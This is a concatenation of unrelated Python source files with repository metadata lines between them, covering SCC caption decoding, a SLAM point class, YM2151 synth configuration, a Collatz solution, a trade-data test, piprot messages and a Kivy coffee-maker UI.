"92f7": "row 04, column 12, with white underlined text.",
"92f8": "row 04, column 16, with plain white text.",
"9279": "row 04, column 16, with white underlined text.",
"927a": "row 04, column 20, with plain white text.",
"92fb": "row 04, column 20, with white underlined text.",
"92fc": "row 04, column 24, with plain white text.",
"92fd": "row 04, column 24, with white underlined text.",
"92fe": "row 04, column 28, with plain white text.",
"927f": "row 04, column 28, with white underlined text.",
"1540": "row 05, column 00, with plain white text.",
"15c1": "row 05, column 00, with white underlined text.",
"15c2": "row 05, column 00, with plain green text.",
"1543": "row 05, column 00, with green underlined text.",
"15c4": "row 05, column 00, with plain blue text.",
"1545": "row 05, column 00, with blue underlined text.",
"1546": "row 05, column 00, with plain cyan text.",
"15c7": "row 05, column 00, with cyan underlined text.",
"15c8": "row 05, column 00, with plain red text.",
"1549": "row 05, column 00, with red underlined text.",
"154a": "row 05, column 00, with plain yellow text.",
"15cb": "row 05, column 00, with yellow underlined text.",
"154c": "row 05, column 00, with plain magenta text.",
"15cd": "row 05, column 00, with magenta underlined text.",
"15ce": "row 05, column 00, with white italicized text.",
"154f": "row 05, column 00, with white underlined italicized text.",
"15d0": "row 05, column 00, with plain white text.",
"1551": "row 05, column 00, with white underlined text.",
"1552": "row 05, column 04, with plain white text.",
"15d3": "row 05, column 04, with white underlined text.",
"1554": "row 05, column 08, with plain white text.",
"15d5": "row 05, column 08, with white underlined text.",
"15d6": "row 05, column 12, with plain white text.",
"1557": "row 05, column 12, with white underlined text.",
"1558": "row 05, column 16, with plain white text.",
"15d9": "row 05, column 16, with white underlined text.",
"15da": "row 05, column 20, with plain white text.",
"155b": "row 05, column 20, with white underlined text.",
"15dc": "row 05, column 24, with plain white text.",
"155d": "row 05, column 24, with white underlined text.",
"155e": "row 05, column 28, with plain white text.",
"15df": "row 05, column 28, with white underlined text.",
"15e0": "row 06, column 00, with plain white text.",
"1561": "row 06, column 00, with white underlined text.",
"15462": "row 06, column 00, with plain green text.",
"15e3": "row 06, column 00, with green underlined text.",
"1564": "row 06, column 00, with plain blue text.",
"15e5": "row 06, column 00, with blue underlined text.",
"15e6": "row 06, column 00, with plain cyan text.",
"1567": "row 06, column 00, with cyan underlined text.",
"1568": "row 06, column 00, with plain red text.",
"15e9": "row 06, column 00, with red underlined text.",
"15ea": "row 06, column 00, with plain yellow text.",
"156b": "row 06, column 00, with yellow underlined text.",
"15ec": "row 06, column 00, with plain magenta text.",
"156d": "row 06, column 00, with magenta underlined text.",
"156e": "row 06, column 00, with white italicized text.",
"15ef": "row 06, column 00, with white underlined italicized text.",
"1570": "row 06, column 00, with plain white text.",
"15f1": "row 06, column 00, with white underlined text.",
"15f2": "row 06, column 04, with plain white text.",
"1573": "row 06, column 04, with white underlined text.",
"15f4": "row 06, column 08, with plain white text.",
"1575": "row 06, column 08, with white underlined text.",
"1576": "row 06, column 12, with plain white text.",
"15f7": "row 06, column 12, with white underlined text.",
"15f8": "row 06, column 16, with plain white text.",
"1579": "row 06, column 16, with white underlined text.",
"157a": "row 06, column 20, with plain white text.",
"15fb": "row 06, column 20, with white underlined text.",
"15fc": "row 06, column 24, with plain white text.",
"15fd": "row 06, column 24, with white underlined text.",
"15fe": "row 06, column 28, with plain white text.",
"157f": "row 06, column 28, with white underlined text.",
"1640": "row 07, column 00, with plain white text.",
"16c1": "row 07, column 00, with white underlined text.",
"16c2": "row 07, column 00, with plain green text.",
"1643": "row 07, column 00, with green underlined text.",
"16c4": "row 07, column 00, with plain blue text.",
"1645": "row 07, column 00, with blue underlined text.",
"1646": "row 07, column 00, with plain cyan text.",
"16c7": "row 07, column 00, with cyan underlined text.",
"16c8": "row 07, column 00, with plain red text.",
"1649": "row 07, column 00, with red underlined text.",
"164a": "row 07, column 00, with plain yellow text.",
"16cb": "row 07, column 00, with yellow underlined text.",
"164c": "row 07, column 00, with plain magenta text.",
"16cd": "row 07, column 00, with magenta underlined text.",
"16ce": "row 07, column 00, with white italicized text.",
"164f": "row 07, column 00, with white underlined italicized text.",
"16d0": "row 07, column 00, with plain white text.",
"1651": "row 07, column 00, with white underlined text.",
"1652": "row 07, column 04, with plain white text.",
"16d3": "row 07, column 04, with white underlined text.",
"1654": "row 07, column 08, with plain white text.",
"16d5": "row 07, column 08, with white underlined text.",
"16d6": "row 07, column 12, with plain white text.",
"1657": "row 07, column 12, with white underlined text.",
"1658": "row 07, column 16, with plain white text.",
"16d9": "row 07, column 16, with white underlined text.",
"16da": "row 07, column 20, with plain white text.",
"165b": "row 07, column 20, with white underlined text.",
"16dc": "row 07, column 24, with plain white text.",
"165d": "row 07, column 24, with white underlined text.",
"165e": "row 07, column 28, with plain white text.",
"16df": "row 07, column 28, with white underlined text.",
"16e0": "row 08, column 00, with plain white text.",
"1661": "row 08, column 00, with white underlined text.",
"16462": "row 08, column 00, with plain green text.",
"16e3": "row 08, column 00, with green underlined text.",
"1664": "row 08, column 00, with plain blue text.",
"16e5": "row 08, column 00, with blue underlined text.",
"16e6": "row 08, column 00, with plain cyan text.",
"1667": "row 08, column 00, with cyan underlined text.",
"1668": "row 08, column 00, with plain red text.",
"16e9": "row 08, column 00, with red underlined text.",
"16ea": "row 08, column 00, with plain yellow text.",
"166b": "row 08, column 00, with yellow underlined text.",
"16ec": "row 08, column 00, with plain magenta text.",
"166d": "row 08, column 00, with magenta underlined text.",
"166e": "row 08, column 00, with white italicized text.",
"16ef": "row 08, column 00, with white underlined italicized text.",
"1670": "row 08, column 00, with plain white text.",
"16f1": "row 08, column 00, with white underlined text.",
"16f2": "row 08, column 04, with plain white text.",
"1673": "row 08, column 04, with white underlined text.",
"16f4": "row 08, column 08, with plain white text.",
"1675": "row 08, column 08, with white underlined text.",
"1676": "row 08, column 12, with plain white text.",
"16f7": "row 08, column 12, with white underlined text.",
"16f8": "row 08, column 16, with plain white text.",
"1679": "row 08, column 16, with white underlined text.",
"167a": "row 08, column 20, with plain white text.",
"16fb": "row 08, column 20, with white underlined text.",
"16fc": "row 08, column 24, with plain white text.",
"16fd": "row 08, column 24, with white underlined text.",
"16fe": "row 08, column 28, with plain white text.",
"167f": "row 08, column 28, with white underlined text.",
"9740": "row 09, column 00, with plain white text.",
"97c1": "row 09, column 00, with white underlined text.",
"97c2": "row 09, column 00, with plain green text.",
"9743": "row 09, column 00, with green underlined text.",
"97c4": "row 09, column 00, with plain blue text.",
"9745": "row 09, column 00, with blue underlined text.",
"9746": "row 09, column 00, with plain cyan text.",
"97c7": "row 09, column 00, with cyan underlined text.",
"97c8": "row 09, column 00, with plain red text.",
"9749": "row 09, column 00, with red underlined text.",
"974a": "row 09, column 00, with plain yellow text.",
"97cb": "row 09, column 00, with yellow underlined text.",
"974c": "row 09, column 00, with plain magenta text.",
"97cd": "row 09, column 00, with magenta underlined text.",
"97ce": "row 09, column 00, with white italicized text.",
"974f": "row 09, column 00, with white underlined italicized text.",
"97d0": "row 09, column 00, with plain white text.",
"9751": "row 09, column 00, with white underlined text.",
"9752": "row 09, column 04, with plain white text.",
"97d3": "row 09, column 04, with white underlined text.",
"9754": "row 09, column 08, with plain white text.",
"97d5": "row 09, column 08, with white underlined text.",
"97d6": "row 09, column 12, with plain white text.",
"9757": "row 09, column 12, with white underlined text.",
"9758": "row 09, column 16, with plain white text.",
"97d9": "row 09, column 16, with white underlined text.",
"97da": "row 09, column 20, with plain white text.",
"975b": "row 09, column 20, with white underlined text.",
"97dc": "row 09, column 24, with plain white text.",
"975d": "row 09, column 24, with white underlined text.",
"975e": "row 09, column 28, with plain white text.",
"97df": "row 09, column 28, with white underlined text.",
"97e0": "row 10, column 00, with plain white text.",
"9761": "row 10, column 00, with white underlined text.",
"9762": "row 10, column 00, with plain green text.",
"97e3": "row 10, column 00, with green underlined text.",
"9764": "row 10, column 00, with plain blue text.",
"97e5": "row 10, column 00, with blue underlined text.",
"97e6": "row 10, column 00, with plain cyan text.",
"9767": "row 10, column 00, with cyan underlined text.",
"9768": "row 10, column 00, with plain red text.",
"97e9": "row 10, column 00, with red underlined text.",
"97ea": "row 10, column 00, with plain yellow text.",
"976b": "row 10, column 00, with yellow underlined text.",
"97ec": "row 10, column 00, with plain magenta text.",
"976d": "row 10, column 00, with magenta underlined text.",
"976e": "row 10, column 00, with white italicized text.",
"97ef": "row 10, column 00, with white underlined italicized text.",
"9770": "row 10, column 00, with plain white text.",
"97f1": "row 10, column 00, with white underlined text.",
"97f2": "row 10, column 04, with plain white text.",
"9773": "row 10, column 04, with white underlined text.",
"97f4": "row 10, column 08, with plain white text.",
"9775": "row 10, column 08, with white underlined text.",
"9776": "row 10, column 12, with plain white text.",
"97f7": "row 10, column 12, with white underlined text.",
"97f8": "row 10, column 16, with plain white text.",
"9779": "row 10, column 16, with white underlined text.",
"977a": "row 10, column 20, with plain white text.",
"97fb": "row 10, column 20, with white underlined text.",
"97fc": "row 10, column 24, with plain white text.",
"97fd": "row 10, column 24, with white underlined text.",
"97fe": "row 10, column 28, with plain white text.",
"977f": "row 10, column 28, with white underlined text.",
"1040": "row 11, column 00, with plain white text.",
"10c1": "row 11, column 00, with white underlined text.",
"10c2": "row 11, column 00, with plain green text.",
"1043": "row 11, column 00, with green underlined text.",
"10c4": "row 11, column 00, with plain blue text.",
"1045": "row 11, column 00, with blue underlined text.",
"1046": "row 11, column 00, with plain cyan text.",
"10c7": "row 11, column 00, with cyan underlined text.",
"10c8": "row 11, column 00, with plain red text.",
"1049": "row 11, column 00, with red underlined text.",
"104a": "row 11, column 00, with plain yellow text.",
"10cb": "row 11, column 00, with yellow underlined text.",
"104c": "row 11, column 00, with plain magenta text.",
"10cd": "row 11, column 00, with magenta underlined text.",
"10ce": "row 11, column 00, with white italicized text.",
"104f": "row 11, column 00, with white underlined italicized text.",
"10d0": "row 11, column 00, with plain white text.",
"1051": "row 11, column 00, with white underlined text.",
"1052": "row 11, column 04, with plain white text.",
"10d3": "row 11, column 04, with white underlined text.",
"1054": "row 11, column 08, with plain white text.",
"10d5": "row 11, column 08, with white underlined text.",
"10d6": "row 11, column 12, with plain white text.",
"1057": "row 11, column 12, with white underlined text.",
"1058": "row 11, column 16, with plain white text.",
"10d9": "row 11, column 16, with white underlined text.",
"10da": "row 11, column 20, with plain white text.",
"105b": "row 11, column 20, with white underlined text.",
"10dc": "row 11, column 24, with plain white text.",
"105d": "row 11, column 24, with white underlined text.",
"105e": "row 11, column 28, with plain white text.",
"10df": "row 11, column 28, with white underlined text.",
"1340": "row 12, column 00, with plain white text.",
"13c1": "row 12, column 00, with white underlined text.",
"13c2": "row 12, column 00, with plain green text.",
"1343": "row 12, column 00, with green underlined text.",
"13c4": "row 12, column 00, with plain blue text.",
"1345": "row 12, column 00, with blue underlined text.",
"1346": "row 12, column 00, with plain cyan text.",
"13c7": "row 12, column 00, with cyan underlined text.",
"13c8": "row 12, column 00, with plain red text.",
"1349": "row 12, column 00, with red underlined text.",
"134a": "row 12, column 00, with plain yellow text.",
"13cb": "row 12, column 00, with yellow underlined text.",
"134c": "row 12, column 00, with plain magenta text.",
"13cd": "row 12, column 00, with magenta underlined text.",
"13ce": "row 12, column 00, with white italicized text.",
"134f": "row 12, column 00, with white underlined italicized text.",
"13d0": "row 12, column 00, with plain white text.",
"1351": "row 12, column 00, with white underlined text.",
"1352": "row 12, column 04, with plain white text.",
"13d3": "row 12, column 04, with white underlined text.",
"1354": "row 12, column 08, with plain white text.",
"13d5": "row 12, column 08, with white underlined text.",
"13d6": "row 12, column 12, with plain white text.",
"1357": "row 12, column 12, with white underlined text.",
"1358": "row 12, column 16, with plain white text.",
"13d9": "row 12, column 16, with white underlined text.",
"13da": "row 12, column 20, with plain white text.",
"135b": "row 12, column 20, with white underlined text.",
"13dc": "row 12, column 24, with plain white text.",
"135d": "row 12, column 24, with white underlined text.",
"135e": "row 12, column 28, with plain white text.",
"13df": "row 12, column 28, with white underlined text.",
"13e0": "row 13, column 00, with plain white text.",
"1361": "row 13, column 00, with white underlined text.",
"13462": "row 13, column 00, with plain green text.",
"13e3": "row 13, column 00, with green underlined text.",
"1364": "row 13, column 00, with plain blue text.",
"13e5": "row 13, column 00, with blue underlined text.",
"13e6": "row 13, column 00, with plain cyan text.",
"1367": "row 13, column 00, with cyan underlined text.",
"1368": "row 13, column 00, with plain red text.",
"13e9": "row 13, column 00, with red underlined text.",
"13ea": "row 13, column 00, with plain yellow text.",
"136b": "row 13, column 00, with yellow underlined text.",
"13ec": "row 13, column 00, with plain magenta text.",
"136d": "row 13, column 00, with magenta underlined text.",
"136e": "row 13, column 00, with white italicized text.",
"13ef": "row 13, column 00, with white underlined italicized text.",
"1370": "row 13, column 00, with plain white text.",
"13f1": "row 13, column 00, with white underlined text.",
"13f2": "row 13, column 04, with plain white text.",
"1373": "row 13, column 04, with white underlined text.",
"13f4": "row 13, column 08, with plain white text.",
"1375": "row 13, column 08, with white underlined text.",
"1376": "row 13, column 12, with plain white text.",
"13f7": "row 13, column 12, with white underlined text.",
"13f8": "row 13, column 16, with plain white text.",
"1379": "row 13, column 16, with white underlined text.",
"137a": "row 13, column 20, with plain white text.",
"13fb": "row 13, column 20, with white underlined text.",
"13fc": "row 13, column 24, with plain white text.",
"13fd": "row 13, column 24, with white underlined text.",
"13fe": "row 13, column 28, with plain white text.",
"137f": "row 13, column 28, with white underlined text.",
"9440": "row 14, column 00, with plain white text.",
"94c1": "row 14, column 00, with white underlined text.",
"94c2": "row 14, column 00, with plain green text.",
"9443": "row 14, column 00, with green underlined text.",
"94c4": "row 14, column 00, with plain blue text.",
"9445": "row 14, column 00, with blue underlined text.",
"9446": "row 14, column 00, with plain cyan text.",
"94c7": "row 14, column 00, with cyan underlined text.",
"94c8": "row 14, column 00, with plain red text.",
"9449": "row 14, column 00, with red underlined text.",
"944a": "row 14, column 00, with plain yellow text.",
"94cb": "row 14, column 00, with yellow underlined text.",
"944c": "row 14, column 00, with plain magenta text.",
"94cd": "row 14, column 00, with magenta underlined text.",
"94ce": "row 14, column 00, with white italicized text.",
"944f": "row 14, column 00, with white underlined italicized text.",
"94d0": "row 14, column 00, with plain white text.",
"9451": "row 14, column 00, with white underlined text.",
"9452": "row 14, column 04, with plain white text.",
"94d3": "row 14, column 04, with white underlined text.",
"9454": "row 14, column 08, with plain white text.",
"94d5": "row 14, column 08, with white underlined text.",
"94d6": "row 14, column 12, with plain white text.",
"9457": "row 14, column 12, with white underlined text.",
"9458": "row 14, column 16, with plain white text.",
"94d9": "row 14, column 16, with white underlined text.",
"94da": "row 14, column 20, with plain white text.",
"945b": "row 14, column 20, with white underlined text.",
"94dc": "row 14, column 24, with plain white text.",
"945d": "row 14, column 24, with white underlined text.",
"945e": "row 14, column 28, with plain white text.",
"94df": "row 14, column 28, with white underlined text.",
"94e0": "row 15, column 00, with plain white text.",
"9461": "row 15, column 00, with white underlined text.",
"9462": "row 15, column 00, with plain green text.",
"94e3": "row 15, column 00, with green underlined text.",
"9464": "row 15, column 00, with plain blue text.",
"94e5": "row 15, column 00, with blue underlined text.",
"94e6": "row 15, column 00, with plain cyan text.",
"9467": "row 15, column 00, with cyan underlined text.",
"9468": "row 15, column 00, with plain red text.",
"94e9": "row 15, column 00, with red underlined text.",
"94ea": "row 15, column 00, with plain yellow text.",
"946b": "row 15, column 00, with yellow underlined text.",
"94ec": "row 15, column 00, with plain magenta text.",
"946d": "row 15, column 00, with magenta underlined text.",
"946e": "row 15, column 00, with white italicized text.",
"94ef": "row 15, column 00, with white underlined italicized text.",
"9470": "row 15, column 00, with plain white text.",
"94f1": "row 15, column 00, with white underlined text.",
"94f2": "row 15, column 04, with plain white text.",
"9473": "row 15, column 04, with white underlined text.",
"94f4": "row 15, column 08, with plain white text.",
"9475": "row 15, column 08, with white underlined text.",
"9476": "row 15, column 12, with plain white text.",
"94f7": "row 15, column 12, with white underlined text.",
"94f8": "row 15, column 16, with plain white text.",
"9479": "row 15, column 16, with white underlined text.",
"947a": "row 15, column 20, with plain white text.",
"94fb": "row 15, column 20, with white underlined text.",
"94fc": "row 15, column 24, with plain white text.",
"94fd": "row 15, column 24, with white underlined text.",
"94fe": "row 15, column 28, with plain white text.",
"947f": "row 15, column 28, with white underlined text.",
"97a1": "Tab Offset 1 column",
"97a2": "Tab Offset 2 columns",
"9723": "Tab Offset 3 columns",
"94a1": "BackSpace",
"94a4": "Delete to End of Row",
"94ad": "Carriage Return",
"1020": "Background White",
"10a1": "Background Semi-Transparent White",
"10a2": "Background Green",
"1023": "Background Semi-Transparent Green",
"10a4": "Background Blue",
"1025": "Background Semi-Transparent Blue",
"1026": "Background Cyan",
"10a7": "Background Semi-Transparent Cyan",
"10a8": "Background Red",
"1029": "Background Semi-Transparent Red",
"102a": "Background Yellow",
"10ab": "Background Semi-Transparent Yellow",
"102c": "Background Magenta",
"10ad": "Background Semi-Transparent Magenta",
"10ae": "Background Black",
"102f": "Background Semi-Transparent Black",
"97ad": "Background Transparent",
"97a4": "Standard Character Set",
"9725": "Double-Size Character Set",
"9726": "First Private Character Set",
"97a7": "Second Private Character Set",
"97a8": "People`s Republic of China Character Set",
"9729": "Korean Standard Character Set",
"972a": "First Registered Character Set",
"9120": "White",
"91a1": "White Underline",
"91a2": "Green",
"9123": "Green Underline",
"91a4": "Blue",
"9125": "Blue Underline",
"9126": "Cyan",
"91a7": "Cyan Underline",
"91a8": "Red",
"9129": "Red Underline",
"912a": "Yellow",
"91ab": "Yellow Underline",
"912c": "Magenta",
"91ad": "Magenta Underline",
"97ae": "Black",
"972f": "Black Underline",
"91ae": "Italics",
"912f": "Italics Underline",
"94a8": "Flash ON",
"9423": "Alarm Off",
"94a2": "Alarm On"
}
def translate_scc(scc_content, brackets='[]'):
"""
Replaces hexadecimal words with their meaning
In order to make SCC files more human readable and easier to debug,
this function is used to replace command codes with their labels and
character bytes with their actual characters
:param scc_content: SCC captions to be translated
:type scc_content: str
:param brackets: Brackets to group the translated content of a command
:type brackets: str
:return: Translated SCC captions
:rtype: str
"""
opening_bracket, closing_bracket = brackets if brackets else ('', '')
scc_elements = set(scc_content.split())
for elem in scc_elements:
name = COMMAND_LABELS.get(elem)
# If a 2 byte command was not found, try retrieving 1 byte characters
if not name:
char1 = ALL_CHARACTERS.get(elem[:2])
char2 = ALL_CHARACTERS.get(elem[2:])
if char1 is not None and char2 is not None:
name = f"{char1}{char2}"
if name:
scc_content = scc_content.replace(
elem, f"{opening_bracket}{name}{closing_bracket}")
return scc_content
| 2.328125
| 2
|
point.py
|
akitoakihito/python_slam
| 2
|
12783901
|
import numpy as np
# class for 3D points in an image frame
class Point(object):
# class constructor
def __init__(self, img_map, location, color):
self.point = location
self.frames = []
self.idx = []
self.color = np.copy(color)
self.id = img_map.max_point
img_map.max_point += 1
img_map.points.append(self)
def orb(self):
des = []
for f in self.frames:
des.append(f.des[f.pts.index(self)])
return des
# class method to add a frame and index from video
# feed to the Point object
def add_observation(self, frame, index):
frame.pts[index] = self
self.frames.append(frame)
self.idx.append(index)
# class method to delete a point from a frame
def delete_point(self):
for f in self.frames:
f.pts[f.pts.index(self)] = None
del self
def homogenous(self):
return np.array([self.point[0], self.point[1], self.point[2], 1.0])
| 2.96875
| 3
|
src/vgm/ym2151/config.py
|
cybermats/vgm_extractor
| 0
|
12783902
|
import copy
import json
from enum import Enum, IntFlag, Flag
from json import JSONEncoder
from typing import Any, List, Dict
from vgm.command import VgmCommand, VgmCommandType
class Waveform(Enum):
SAW = 0
SQUARE = 1
TRIANGLE = 2
NOISE = 3
def repr_json(self):
return self.name
class Operators(Flag):
MOD1 = 1
CAR1 = 2
MOD2 = 4
CAR2 = 8
def repr_json(self):
o = []
if self & Operators.MOD1:
o.append(Operators.MOD1.name)
if self & Operators.CAR1:
o.append(Operators.CAR1.name)
if self & Operators.MOD2:
o.append(Operators.MOD2.name)
if self & Operators.CAR2:
o.append(Operators.CAR2.name)
return "|".join(o)
class BaseConfig:
def __init__(self, other=None) -> None:
self.waveform: Waveform = Waveform.SAW if not other else other.waveform
self.lfo: int = 0 if not other else other.lfo
self.amp_md: int = 0 if not other else other.amp_md
self.phs_md: int = 0 if not other else other.phs_md
def __eq__(self, other: Any) -> bool:
if isinstance(other, BaseConfig):
return (
self.lfo == other.lfo
and self.phs_md == other.phs_md
and self.amp_md == other.amp_md
and self.waveform == other.waveform
)
return NotImplemented
# noinspection PyArgumentList
def __deepcopy__(self, _) -> object:
return BaseConfig(self)
def repr_json(self):
return self.__dict__
class OperatorConfig:
def __init__(self, other=None) -> None:
self.total_level: int = 0 if not other else other.total_level
self.attack_rate: int = 0 if not other else other.attack_rate
self.first_decay_rate: int = 0 if not other else other.first_decay_rate
self.first_decay_level: int = 0 if not other else other.first_decay_level
self.second_decay_rate: int = 0 if not other else other.second_decay_rate
self.release_rate: int = 0 if not other else other.release_rate
self.key_scale: int = 0 if not other else other.key_scale
self.multiply: int = 0 if not other else other.multiply
self.first_detune: int = 0 if not other else other.first_detune
self.second_detune: int = 0 if not other else other.second_detune
self.ase: bool = False if not other else other.ase
def __eq__(self, other: Any) -> bool:
if isinstance(other, OperatorConfig):
return (
self.first_detune == other.first_detune
and self.second_detune == other.second_detune
and self.multiply == other.multiply
and self.total_level == other.total_level
and self.key_scale == other.key_scale
and self.attack_rate == other.attack_rate
and self.ase == other.ase
and self.first_decay_rate == other.first_decay_rate
and self.second_decay_rate == other.second_decay_rate
and self.first_decay_level == other.first_decay_level
and self.release_rate == other.release_rate
)
return NotImplemented
# noinspection PyArgumentList
def __deepcopy__(self, _) -> object:
return OperatorConfig(self)
def repr_json(self):
return {
"tl": self.total_level,
"ar": self.attack_rate,
"d1r": self.first_decay_rate,
"d1l": self.first_decay_level,
"d2r": self.second_decay_rate,
"rr": self.release_rate,
"ks": self.key_scale,
"mul": self.multiply,
"dt1": self.first_detune,
"dt2": self.second_detune,
"ase": self.ase,
}
class NoteConfig:
def __init__(self, other=None) -> None:
self.right: bool = False if not other else other.right
self.left: bool = False if not other else other.left
self.octave: int = 0 if not other else other.octave
self.note: int = 0 if not other else other.note
self.key_fraction: int = 0 if not other else other.key_fraction
def __eq__(self, other: Any) -> bool:
if isinstance(other, NoteConfig):
return (
self.right == other.right
and self.left == other.left
and self.octave == other.octave
and self.note == other.note
and self.key_fraction == other.key_fraction
)
return NotImplemented
# noinspection PyArgumentList
def __deepcopy__(self, _) -> object:
return NoteConfig(self)
def repr_json(self):
return {
"right": self.right,
"left": self.left,
"octave": self.octave,
"note": self.note,
"key_fraction": self.key_fraction,
}
class ChannelConfig:
def __init__(self, other=None) -> None:
self.operators: List[OperatorConfig] = (
[] if not other else copy.deepcopy(other.operators)
)
self.fb: int = 0 if not other else other.fb
self.ams: int = 0 if not other else other.ams
self.pms: int = 0 if not other else other.pms
self.connection: int = 0 if not other else other.connection
self.noise: bool = False if not other else other.noise
self.noise_freq: int = 0 if not other else other.noise_freq
if not other:
for dev in range(4):
self.operators.append(OperatorConfig())
def __eq__(self, other: Any) -> bool:
if isinstance(other, ChannelConfig):
return (
self.fb == other.fb
and self.connection == other.connection
and self.ams == other.ams
and self.pms == other.pms
and self.operators == other.operators
and self.noise == other.noise
and self.noise_freq == other.noise_freq
)
return NotImplemented
# noinspection PyArgumentList
def __deepcopy__(self, _) -> object:
return ChannelConfig(self)
def repr_json(self):
return {
"feedback": self.fb,
"connection": self.connection,
"ams": self.ams,
"pms": self.pms,
"noise": self.noise,
"noise_freq": self.noise_freq,
"m1": self.operators[0],
"c1": self.operators[2],
"m2": self.operators[1],
"c2": self.operators[3],
}
class Config:
def __init__(
self,
id: int,
base: BaseConfig = BaseConfig(),
channel: ChannelConfig = ChannelConfig(),
operators: Operators = 0,
):
self._id = id
self._base = base
self._operators: Operators = operators
self._channel = channel
def __getattr__(self, item):
if item == "lfo":
return self._base.lfo
if item == "phs_md":
return self._base.phs_md
if item == "amp_md":
return self._base.amp_md
if item == "waveform":
return self._base.waveform
if item == "enabled_operators":
return self._operators
return getattr(self._channel, item)
def compare(self, base: BaseConfig, channel: ChannelConfig, operators: Operators):
return (
self._base == base
and self._channel == channel
and self._operators == operators
)
def repr_json(self) -> Dict:
return {
"id": self._id,
"base": self._base,
"operators": self._operators,
"channel": self._channel,
}
class ConfigEncoder(json.JSONEncoder):
def default(self, o: Any) -> Any:
if hasattr(o, "repr_json"):
return o.repr_json()
else:
return json.JSONEncoder.default(self, o)
class YM2151Command(VgmCommand):
command_type = VgmCommandType.YM2151
def __init__(self, cmd_id, reg: int, value: int) -> None:
super().__init__(cmd_id)
self.reg = reg
self.value = value
def __str__(self) -> str:
return f"YM2151Command(Reg: {hex(self.reg)}, Data: {hex(self.value)})"
def create(reg: int, value: int) -> YM2151Command:
return YM2151Command(0x54, reg, value)
| 2.625
| 3
|
problem14.py
|
prashdash112/Project-Euler-solutions
| 1
|
12783903
|
'''
The following iterative sequence is defined for the set of positive integers:
n → n/2 (n is even)
n → 3n + 1 (n is odd)
Using the rule above and starting with 13, we generate the following sequence:
13 → 40 → 20 → 10 → 5 → 16 → 8 → 4 → 2 → 1
It can be seen that this sequence (starting at 13 and finishing at 1) contains 10 terms. Although it has not been proved yet (Collatz Problem), it is thought that all starting numbers finish at 1.
Which starting number, under one million, produces the longest chain?
NOTE: Once the chain starts the terms are allowed to go above one million.
'''
def collatz(n): #returning the length of collatz sequence
arr=[]
while n >1:
arr.append(n)
if (n%2):
n=3*n+1
else:
n=n//2
return(len(arr)+1)
# Driver function
ans = max(range(2, 1000000), key=collatz)
print(ans)
'''
# Alternate function to generate collatz sequence
def collatz(n):
while n > 1:
print(n ,end=' ')
if (n % 2):
# n is odd
n = 3*n + 1
else:
# n is even
n = n//2
print(1,'\n')
'''
| 4.3125
| 4
|
tests/gen/test_trade_data_generation.py
|
PontusHultkrantz/tcapy
| 0
|
12783904
|
"""Tests out the code for generating randomised test trades/orders.
"""
from __future__ import print_function
__author__ = 'saeedamen' # <NAME> / <EMAIL>
#
# Copyright 2017 Cuemacro Ltd. - http//www.cuemacro.com / @cuemacro
#
# See the License for the specific language governing permissions and limitations under the License.
#
import os
from tcapy.conf.constants import Constants
from tcapy.data.datatestcreator import DataTestCreator
from tcapy.data.databasesource import DatabaseSourceCSVBinary as DatabaseSourceCSV
from tcapy.data.databasesource import DatabaseSourceArctic
from tcapy.util.loggermanager import LoggerManager
logger = LoggerManager().getLogger(__name__)
constants = Constants()
postfix = 'dukascopy'
ticker = ['EURUSD']
start_date = '01 May 2017'
finish_date = '31 May 2017'
use_test_csv = True
# mainly just to speed up tests - note: you will need to generate the HDF5 files using convert_csv_to_h5.py from the CSVs
use_hdf5_market_files = False
logger.info('Make sure you have created folder ' + constants.csv_folder + ' & ' + constants.temp_data_folder +
' otherwise tests will fail')
########################################################################################################################
# you can change the test_data_harness_folder to one on your own machine with real data
folder = constants.test_data_harness_folder
eps = 10 ** -5
if use_test_csv:
# only contains limited amount of EURUSD and USDJPY in Apr/Jun 2017
if use_hdf5_market_files:
market_data_store = os.path.join(folder, 'small_test_market_df.h5')
else:
market_data_store = os.path.join(folder, 'small_test_market_df.csv.gz')
def test_randomized_trade_data_generation():
"""Tests randomized trade generation data (and writing to database)
"""
data_test_creator = DataTestCreator(write_to_db=False)
# use database source as Arctic for market data (assume we are using market data as a source)
if use_test_csv:
data_test_creator._database_source_market = DatabaseSourceCSV(market_data_database_csv=market_data_store)
else:
data_test_creator._database_source_market = DatabaseSourceArctic(postfix=postfix)
# create randomised trade/order data
trade_order = data_test_creator.create_test_trade_order(ticker, start_date=start_date, finish_date=finish_date)
# trade_order has dictionary of trade_df and order_df
# make sure the number of trades > number of orders
assert (len(trade_order['trade_df'].index) > len(trade_order['order_df'].index))
if __name__ == '__main__':
test_randomized_trade_data_generation()
# import pytest; pytest.main()
| 2.0625
| 2
|
piprot/models/messages.py
|
emichal/piprot
| 0
|
12783905
|
<gh_stars>0
class Messages:
NOT_ROTTEN: str = "{package} ({version}) is up to date"
IGNORED: str = "Ignoring updates for {package}."
CANNOT_FETCH: str = "Skipping {package} ({version}). Cannot fetch info from PyPI"
NO_DELAY_INFO: str = (
"{package} ({current_version}) is out of date. "
"No delay info available. "
"Latest version is: {latest_version}"
)
ROTTEN_NOT_DIRECT_SUCCESSOR: str = (
"{package} ({current_version}) "
"is {rotten_days} days out of date. "
"Latest version is: {latest_version} "
"({days_since_last_release} days old)."
)
ROTTEN_DIRECT_SUCCESSOR: str = (
"{package} ({current_version}) "
"is {rotten_days} days out of date. "
"Latest version is: {latest_version}"
)
| 2.28125
| 2
|
temp.py
|
CAES-Python/Coffee_maker_analog
| 0
|
12783906
|
# -*- coding: cp850 -*-
from kivy.app import App
from kivy.clock import Clock
from kivy.clock import Clock as clock
from kivy.config import Config
from kivy.gesture import Gesture,GestureDatabase
from kivy.graphics.vertex_instructions import (Rectangle,
Ellipse)
from kivy.graphics.context_instructions import Color
from kivy.lang import Builder
from kivy.uix.scatter import Scatter
from kivy.uix.label import Label
from kivy.uix.floatlayout import FloatLayout
from kivy.uix.boxlayout import BoxLayout
from kivy.uix.gridlayout import GridLayout
from kivy.uix.slider import Slider
from kivy.uix.screenmanager import ScreenManager, Screen
from kivy.uix.anchorlayout import AnchorLayout
from kivy.uix.checkbox import CheckBox
from kivy.uix.spinner import Spinner
from kivy.garden.knob import Knob
from kivy.garden.gauges import Gauges
from kivy.garden.light_indicator import Light_indicator
from kivy.properties import NumericProperty, BoundedNumericProperty, ListProperty, ObjectProperty, StringProperty
import collections
import math
import os
import random
import sys
from math import *
import gesture_box as gesture
# This is where Kivy captures gestures.
class Runner(gesture.GestureBox):
pass
#define the Screen Manager
class CoffeeScreenManager(ScreenManager):
pass
#define the screens
class MenuScreen(Screen):
pass
class CoffeeScreen(Screen):
h2o_ftemp = StringProperty('')
h2o_ctemp = StringProperty('')
